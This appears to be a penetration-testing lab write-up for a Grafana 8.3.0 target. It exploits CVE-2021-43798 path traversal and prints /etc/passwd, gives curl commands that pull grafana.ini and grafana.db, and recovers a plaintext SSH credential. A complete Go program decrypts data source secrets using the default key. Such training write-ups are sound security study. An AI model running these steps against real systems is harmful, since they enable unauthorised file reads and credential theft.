Exploitation


The target Grafana instance is running version v8.3.0 (914fcedb72), which falls inside the range affected by CVE-2021-43798, an unauthenticated path traversal through the plugin asset endpoint (/public/plugins/<plugin>/...).

CVE-2021-43798


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ python3 CVE-2021-43798.py -H http://$IP:3000/
Read file > /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
grafana:x:113:117::/usr/share/grafana:/bin/false
prometheus:x:1000:1000::/home/prometheus:/bin/false
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh

Confirming the 2nd exploit

Data Source Secret Decryption


Leveraging CVE-2021-43798, I can retrieve the Grafana configuration and database files from the target and attempt to decrypt the stored data source secrets.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ curl -s --path-as-is "http://$IP:3000/public/plugins/welcome/../../../../../../../../../../../etc/grafana/grafana.ini" --output grafana.ini    
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ curl -s --path-as-is "http://$IP:3000/public/plugins/welcome/../../../../../../../../../../../var/lib/grafana/grafana.db" --output grafana.db

curl's --path-as-is flag is needed here so the client sends the ../ sequences unchanged instead of normalising them away before the request leaves. The two required files are:

  • Grafana configuration file; /etc/grafana/grafana.ini
  • Grafana database file; /var/lib/grafana/grafana.db

grafana.ini


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ grep secret_key grafana.ini
;secret_key = SW2YcwTIb9zpOOhoPsMm
# current key provider used for envelope encryption, default to static value specified by secret_key
;secret_key =

Both secret_key lines are commented out (leading ;), so Grafana falls back to its built-in default key, SW2YcwTIb9zpOOhoPsMm, and that is the key the data source secrets in the database are encrypted with.

grafana.db


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ open grafana.db

Opening up the SQLite DB

Grafana Credential


There is the password hash for the admin user. Grafana stores it as salted PBKDF2-HMAC-SHA256 (10000 iterations, with the salt kept in the same row), and there is a tool to convert this into a crackable, hashcat-friendly hash string, but hashcat was unable to crack the password hash.

data_source Table


The data_source table is what matters: it holds the credential Grafana uses to reach the target Prometheus instance, the basic auth user is set to sysadmin, and the password is stored encrypted rather than in clear.

Decryption


The decryption script now has to be updated with the secret key from grafana.ini and the encrypted value taken from the data_source table.

Executing the decryption script reveals the password: SuperSecureP@ssw0rd. Given that the web GUI of the target Prometheus instance has no authentication endpoint, I can test this password for the sysadmin user against the target SSH server instead.
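As an added example (not the decryption script used above, and not Grafana's own code), the following Go program re-implements the legacy scheme Grafana 8.x uses for data source secrets when envelope encryption is off: the stored value is base64 of an 8-byte salt, a 16-byte IV and the AES-256-CFB ciphertext, with the AES key derived as PBKDF2-HMAC-SHA256(secret_key, salt, 10000 iterations, 32 bytes). It assumes the encrypted password sits in the secure_json_data column as {"basicAuthPassword":"<base64>"} and that the instance still runs on the default secret_key, as grafana.ini above shows. The sample row in main is constructed with a made-up password; the target's real ciphertext is not reproduced. PBKDF2 is written out by hand so nothing outside the standard library is needed. If a decoded value starts with # it is envelope-encrypted (the 8.3 feature toggle the grafana.ini comment refers to) and needs the data key from the data_keys table, which this example does not handle.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
)

// Grafana's legacy secret encryption (pkg/util/encryption.go, what 8.3 uses with envelope encryption
// off): stored = base64(salt(8) || iv(16) || AES-256-CFB(key, iv, pt)), key = PBKDF2-HMAC-SHA256(secret_key, salt, 10000, 32).
const (
	saltLength       = 8
	pbkdf2Iterations = 10000
	keyLength        = 32
	DefaultSecretKey = "SW2YcwTIb9zpOOhoPsMm" // what Grafana uses when secret_key stays commented out
)

// pbkdf2SHA256 is a minimal RFC 8018 PBKDF2-HMAC-SHA256 so the example needs only the stdlib.
func pbkdf2SHA256(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		prf.Reset()
		prf.Write(salt)
		prf.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := prf.Sum(nil)                 // U_1 = PRF(P, S || INT(i))
		t := append([]byte(nil), u...)
		for i := 1; i < iterations; i++ { // T_i = U_1 xor U_2 xor ... xor U_c
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// Decrypt reverses the scheme above; payload is the base64-decoded stored value.
func Decrypt(payload []byte, secret string) ([]byte, error) {
	if len(payload) < saltLength+aes.BlockSize {
		return nil, errors.New("payload too short to hold salt and IV")
	}
	salt, iv, ct := payload[:saltLength], payload[saltLength:saltLength+aes.BlockSize], payload[saltLength+aes.BlockSize:]
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secret), salt, pbkdf2Iterations, keyLength))
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCFBDecrypter(block, iv).XORKeyStream(pt, ct)
	return pt, nil
}

// Encrypt is the forward direction, used here only to build a constructed sample row.
func Encrypt(plaintext []byte, secret string) ([]byte, error) {
	out := make([]byte, saltLength+aes.BlockSize+len(plaintext))
	if _, err := rand.Read(out[:saltLength+aes.BlockSize]); err != nil { // random salt and IV
		return nil, err
	}
	salt, iv := out[:saltLength], out[saltLength:saltLength+aes.BlockSize]
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secret), salt, pbkdf2Iterations, keyLength))
	if err != nil {
		return nil, err
	}
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(out[saltLength+aes.BlockSize:], plaintext)
	return out, nil
}

// DecryptSecureJSONData takes a data_source.secure_json_data column value such as
// {"basicAuthPassword":"<base64>"} and returns every field decrypted with the given key.
func DecryptSecureJSONData(column, secret string) (map[string]string, error) {
	var enc map[string][]byte // encoding/json base64-decodes []byte fields for us
	if err := json.Unmarshal([]byte(column), &enc); err != nil {
		return nil, err
	}
	out := make(map[string]string, len(enc))
	for k, v := range enc {
		pt, err := Decrypt(v, secret)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", k, err)
		}
		out[k] = string(pt)
	}
	return out, nil
}

func main() { // constructed sample row; the password is made up, not the target's
	ct, _ := Encrypt([]byte("example-password"), DefaultSecretKey)
	column, _ := json.Marshal(map[string][]byte{"basicAuthPassword": ct})
	secrets, err := DecryptSecureJSONData(string(column), DefaultSecretKey)
	fmt.Println(string(column), "->", secrets, err)
}
```

To use it against a recovered grafana.db, pull the column with `sqlite3 grafana.db "select secure_json_data from data_source"` and pass that JSON string to DecryptSecureJSONData together with the secret_key in force (the default above, or whatever an uncommented secret_key line sets). CFB mode has no integrity check, so a wrong key does not fail; it simply yields garbage, which is why checking that the output is printable is the only sanity test available.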